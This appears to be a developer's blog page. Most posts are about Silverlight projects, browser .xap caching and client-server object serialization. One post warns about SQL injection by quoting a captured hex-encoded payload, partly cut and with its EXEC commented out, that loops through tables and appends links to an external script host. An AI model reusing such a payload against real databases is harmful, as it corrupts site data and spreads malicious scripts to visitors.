Share on Facebook

So Sad!   That's what my 2 year old grandson hears from his mom when he's about to be repriminded.  You can see his head come up, he knows he should have thought before acting.

I want to talk about lessons learned here.  Not to critiscize, but hopefully to provide some wisdom for others to pattern their Silverlight projects after.  My Silverlight project was set aside in favor of speed and to optimize time to project completion.  In other words, the deadline loomed and the work wasn't done.  In addition to that, there were no other team members who could help with the load which meant I sat alone on the critical path.  So it's done for now.

I'm not done for long, though, have no fear.  When you get bucked off the horse - you by golly get back on and ride.  So I will be working Silverlight right along - but once again it will not be in my day job.

So Sad!

Share on Facebook

There was an interesting topic that came up today on the LinkedIn Minnesota Group - that of an anonymous business that had had their entire SQL database filled with junk from a hack attack.

The first thing that came to my mind there was Sql Injection.  It's insideous, and dangerous, and the crooks are very bold in their efforts to use it. 

I have a perfect example of one of those types of web site visits where the low-life-can-it-be-human (LLCIBH) who was at the page was trying to inject poison into the site.  My sites inform me of any failed access attempts or errors in an email - and that email includes all the information I may need to troubleshoot the problem.  So, on this day I was notified by email of the full contents of the request.

The LLCIBH (translation above) sent a hexidecimal encoded, very long querystring at the site, which when decoded contained SQL that looked something like this:

DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343
0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374206
12E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622
.................stuff left out here..........
6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D27272729464554434820
4E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F53
45205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));
select @s

--EXEC(@S); 

That mess up there translates into sql that will pull a list of updateable objects from "sysobjects a" then proceed to pull the list, declare a cursor and for EACH and EVERY updateable object found - update that table Appending links to this LLCIBH site.

If this happens to anyone - they should just plan on restoring from backup.  The mess is too insideous - too entangled to fix by hand.  It's basically ruined.

Be Careful Out There.

Bobbi

Share on Facebook

I'm still crazy in love with the promise of Silverlight and so excited to be able to work in it.  So please take that statement and keep it in mind while I rant.

I'm able to participate in the development of a rather ambitious silverlight application.  One which is teaching me a lot about how to optimize my time, how to find what's really broken, and how to keep the dang debugger attached.

It seems that the .xap file is cached by the browser.  This is doubly complicated if you've got a Silverlight application that uses a separate .dll for business logic.  Changing the Business Logic .dll will not "register" with the environment to send a new xap.  Either that, or Internet Explorer doesn't think it should have to download a new .xap file to the client for whatever reason. 

You know you've got an old copy of the .xap in your cache if your debugging breakpoints are disabled when the control is loaded in the browser.  So although this is easily fixed (CLEAR YOUR TEMPORARY FILES)  It took me literally DAYS to figure it out.  Heck, I tried everything.  Close Visual Studio, ReBoot My Computer, Search the Internet for answers.  So Heartbreaking when you're on a fixed timeline.

Tools/Internet Options/Delete/Delete Files/YES/Close/OK

That's my new routine, I'm going to actually add it as a post build action for my silverlight project.  Whenever it gets compiled, it will clear the temporary files before launching the debugger when I F5.

On September 9, 2008, I've got a session on Search Engine Optimization for Silverlight Web Applications at the Minnesota Developer's Conference.  There, I'll be giving examples of how to code your web apps to keep our web OPEN.   This talk will be lots of code and little background, so bring your Inner Geek and be ready to let her out.

 

Share on Facebook

The problem is how to transport objects and data from server to silverlight and back and do the least amount of typing. The databinding features of a Silverlight application make transporting the contents of an object from code to UI so simple. That's how I want to be able to send the contents of the object to the server and how I want to be able to retrieve the contents of that object on the server side.

In a monolithic web application this is simple, serialize from object to xml and back again into object after the outside code has been executed against the object contents.
In a silverlight project, it's not so simple for these reasons:

• 1. Silverlight doesn't support serialization natively
• 2. Silverlight objects in binary form must be in a separate runtime. (double the fun)
• 3. Each class in a Silverlight project must be echoed as a class on the server

Here is one way to resolve these problems and add a service layer to your .asp/mvc application.
I used these tools to complete the task: Subsonic for code gen, DimeBrain (huh?) Silverlight Serialization which is based on CSLA Light classes, Peter Bromberg's SharpLib for Silverlight

Here's what happens: The silverlight control has a member which is one of the classes marked for serialization that will have it's properties bound to controls for user manipulation. When the user pushes Save- this object is Serialized to Xml (DimeBrain), compressed (Peter Bromberg), base64'd (.NET), and UrlEncoded (.NET).
The resulting 'dried" data is then transmitted to the server in a form.POST request. In an MVC app, the url that is targeted looks like so: http://server/admin/data/classname

Again, using MVC, On the server within the targeted controller (admin), there is a method (data) which calls a function the purpose of which is to reverse the process used in Silverlight. UrlDecode, un-base64, uncompress, and deserialize the Request Stream to an object.

The xml representation that is received contains the name of the class which was serialized. These server side classes are generated code, (SubSonic!, using custom templates ) and have been added to the Server application's Business Logic layer. The end result is that there is a class on the server with the same class structure as the Silverlight object. And both of these data holders are created using Code Gen.

When this object has been "re-hydrated" so to speak, it's passed off to the correct data Repository for parsing into a server-side object (Entity Framework,maybe?) and placed into storage.
Once the wiring is in place, implementing additional control communications is a 45 minute job. Can that be any simpler?